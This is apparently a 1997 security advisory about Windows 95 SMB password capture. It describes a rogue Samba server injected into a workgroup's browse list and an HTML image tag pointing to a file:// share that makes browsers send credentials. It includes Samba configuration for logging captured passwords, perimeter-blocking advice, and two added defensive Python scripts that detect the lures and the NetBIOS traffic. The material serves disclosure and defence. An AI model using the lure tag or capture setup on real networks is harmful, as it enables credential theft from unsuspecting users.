SMB attacks on Windows 95

VERSIONS AFFECTED

Windows 95, with and without Internet Explorer.

DESCRIPTION

Apparently a new problem has been discovered that allows a malicious Web
developer to snag a Windows 95 password in cleartext, given only the IP
address and Workgroup name. The action can be carried out in such a way that
it leaves no noticeable trace whatsoever, which makes it incredibly
dangerous indeed.

A Master Browser can be indirectly used as a tool against the machines it
serves by introducing a hostile host into the browse list. This exploit
requires the use of a SAMBA server, which is a Unix-based implementation of
an SMB-compatible server.

Samba servers are capable of announcing themselves to a remote network
(workgroup) on a different subnet, given the workgroup name. An intruder
may use this technique in two ways to gain access to a username and
password. They could introduce a share from the system they place in the
browse list, and wait for a user to make an attempt at accessing it - at
which point the username and password are transmitted. They could also
embed the file:// tag into a Web page and wait for a user to arrive at that
page - at which point the Web browser would initiate a connection to the
remote server named in the file:// tag, and promptly transmit the username
and password. Sample HTML tag:

<img src=file://\\testsystem/testshare/testfile.gif> 
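The lure just described is a page element that the browser fetches on its own, so a defender can look for it in page content before it reaches a client. The following scanner is an added example, not code from the original advisory; it parses HTML, picks out attributes a browser fetches automatically (src, href, background, data), and reports the SMB host and share that a file:// URL or bare UNC path in them would make the client connect to. The sample HTML and the hostnames in it are constructed for the example.

```python
"""Detect web-page lures that point a browser at a remote SMB share.

Added example (not part of the original advisory). It scans HTML for the
pattern the advisory describes, e.g. <img src=file://\\host/share/file.gif>,
in attributes a browser fetches on its own, and reports the SMB host and
share each one would make the client connect to. The HTML below is
constructed for the example; the hostnames in it are placeholders.
"""
import re
from html.parser import HTMLParser

# Attributes whose value a browser fetches automatically (src, background,
# data) or on a click (href).
FETCH_ATTRS = {"src", "href", "background", "data"}

# Matches a reference to a remote SMB host: an optional "file:" scheme,
# then either two separators (file://host/..., \\host\...) or four or five
# (file://\\host/..., file:////host/..., file://///host/...), then the host.
# Exactly three separators (file:///C:/...) is a local path and is skipped.
_REMOTE_RE = re.compile(
    r"^(?:file:)?(?:[/\\]{2}|[/\\]{4,5})([^/\\\s?#:]+)(?:[/\\]+([^/\\\s?#]*))?",
    re.IGNORECASE,
)


def smb_target(value):
    """Return (host, share) if the URL/path names a remote SMB resource, else None."""
    m = _REMOTE_RE.match(value.strip())
    if not m:
        return None
    return m.group(1), m.group(2) or ""


class _LureScanner(HTMLParser):
    """Collects every tag attribute that would trigger an SMB connection."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is None or name.lower() not in FETCH_ATTRS:
                continue
            target = smb_target(value)
            if target:
                host, share = target
                self.findings.append(
                    {"tag": tag, "attr": name, "host": host,
                     "share": share, "value": value}
                )


def find_smb_lures(html):
    """Return a list of findings, one per attribute pointing at a remote share."""
    scanner = _LureScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page: two lures (one in the advisory's own form, one as a
# bare UNC path), plus an HTTP image and a local file link that must not fire.
SAMPLE_HTML = r"""<html><body>
<img src=file://\\testsystem/testshare/testfile.gif>
<img src="http://www.example.invalid/logo.gif">
<a href="file:///C:/Windows/notepad.exe">local file, not flagged</a>
<iframe src="\\10.0.0.5\share\page.html"></iframe>
</body></html>"""

if __name__ == "__main__":
    for f in find_smb_lures(SAMPLE_HTML):
        print(f"<{f['tag']} {f['attr']}> -> \\\\{f['host']}\\{f['share']}")
```

Run against a proxy-captured page, the scanner flags the `<img>` in the advisory's form and the bare UNC `<iframe>`, while the HTTP image and the `file:///C:/` local path are left alone; the separator count is what distinguishes a remote host from a local drive path.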

TESTING

* Compile Samba using -DDEBUG_PASSWORD

* Employ the remote announce option in the smb.cfg file, specifying the
remote host or broadcast address, and workgroup name of the network you
wish to test. Sample:

 workgroup = TEST
 preferred master = yes
 domain master = yes
 security = user
 debug level = 100
 remote announce = 10.0.0.255/WORKGROUP_NAME

* Establish a share on the Samba server. Sample:

[testt]
   path = /tmp
   public = no
   browsable = yes

* If you wish, place one or more files in the directory, then start the
smbd daemon. At this point, any SMB related traffic (e.g. browsing the
local machine) will cause the Samba server to announce itself to the remote
network specified. If the remote network is successfully contacted, the
Samba server may be added to that network's browse list.

Later, checking the Samba log will reveal any information it has collected
about usernames and passwords. Entries will look similar to this:

checking user=[username] pass=[password] 

DEFENSE

Even though the remote network's workgroup name is needed before this type
of attack can be carried out, keep in mind that this name can easily be
obtained using the Windows nbtstat command.

Also take note that it is VERY easy for a perpetrator to completely hide
themselves during this attack by making a few minor adjustments to their
hostname and /etc/hosts file. In other words, this could be done in an
untraceable fashion in certain instances.

To stop this type of attack from outside your network (Internet), block
inbound traffic destined for ports 137, 138, and 139 at your network
perimeter. This does not address the same attack coming from inside your
network.
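A perimeter block on 137-139 is only as good as the evidence that it holds, so it is worth checking firewall logs for traffic that reaches those ports from outside. The following checker is an added example, not code from the advisory; it reads log lines in a simple key=value form (an assumption about the log format, adapt the parser to your firewall's output), classifies the source against an explicit list of internal networks, and reports every packet from outside to port 137, 138 or 139. Browse announcements from a remote Samba host, the first vector the advisory describes, travel over the NetBIOS datagram service on UDP 138, so they show up here too. The log lines and addresses are constructed for the example.

```python
"""Flag NetBIOS/SMB traffic arriving from outside the network.

Added example (not from the advisory). It reads firewall log lines in a
simple key=value form, which is an assumption about the log format, and
reports any packet from a non-internal source to port 137, 138 or 139,
the ports the advisory says to block at the perimeter. The log lines and
addresses below are constructed for the example.
"""
import ipaddress
import re

# Ports the advisory names: NetBIOS name (137), datagram (138) and session
# (139) services. A browse announcement from a remote Samba host arrives on
# the datagram service.
NETBIOS_PORTS = {137, 138, 139}

# What counts as "inside" is site policy, not a property of the address, so
# it is listed explicitly rather than derived from ipaddress.is_private.
INTERNAL_NETS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]

_KV_RE = re.compile(r"(\w+)=(\S*)")


def parse_line(line):
    """Split 'KEY=value KEY=value ...' into a dict; text without '=' is ignored."""
    return {k.upper(): v for k, v in _KV_RE.findall(line)}


def is_internal(addr):
    """True if addr parses as an IP inside one of INTERNAL_NETS."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in INTERNAL_NETS)


def external_netbios_hits(lines):
    """Return (src, proto, dpt) for each packet from outside to a NetBIOS/SMB port."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        try:
            dpt = int(rec.get("DPT", ""))
        except ValueError:
            continue   # line without a destination port (e.g. ICMP)
        src = rec.get("SRC", "")
        if dpt in NETBIOS_PORTS and src and not is_internal(src):
            hits.append((src, rec.get("PROTO", "?").upper(), dpt))
    return hits


def sources_by_count(hits):
    """Count hits per source address, most active first."""
    counts = {}
    for src, _proto, _dpt in hits:
        counts[src] = counts.get(src, 0) + 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


# Constructed log lines (netfilter-style fields). The first, third and fifth
# are the ones a perimeter filter on 137-139 would have stopped; the second
# is internal-to-internal and, as the advisory notes, is not covered.
LOG_LINES = [
    "IN=eth0 SRC=203.0.113.7 DST=10.0.0.21 PROTO=UDP SPT=137 DPT=137",
    "IN=eth1 SRC=10.0.0.5 DST=10.0.0.21 PROTO=TCP SPT=1045 DPT=139",
    "IN=eth0 SRC=198.51.100.9 DST=10.0.0.21 PROTO=TCP SPT=2099 DPT=139",
    "IN=eth0 SRC=203.0.113.7 DST=10.0.0.21 PROTO=TCP SPT=40001 DPT=80",
    "IN=eth0 SRC=203.0.113.7 DST=10.0.0.255 PROTO=UDP SPT=138 DPT=138",
    "IN=eth0 SRC=203.0.113.7 DST=10.0.0.21 PROTO=ICMP TYPE=8",
]

if __name__ == "__main__":
    for src, n in sources_by_count(external_netbios_hits(LOG_LINES)):
        print(f"{src}: {n} NetBIOS/SMB packet(s) from outside")
```

The internal network list is deliberate: Python's `ipaddress` treats documentation ranges such as 203.0.113.0/24 as private, so relying on `is_private` would silently drop exactly the kind of address a test log uses. The internal 10.0.0.5 -> 139 line is not flagged, which mirrors the advisory's caveat that a perimeter block does nothing for traffic originating inside.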

Microsoft was informed of this problem on March 17, 1997. Watch this page
for more information.

Credits

Discovered by Steve Birnbaum with help from Mark Gazit.
Additional support from Yacov Drori and Roman Lasker.
Thanks to hobbit for his paper on CIFS.
Thanks also to BioH for helping to test this, and anyone else who helped or
provided ideas.

Posted here at The NT Shop March 17, 1997 - 10:40pm
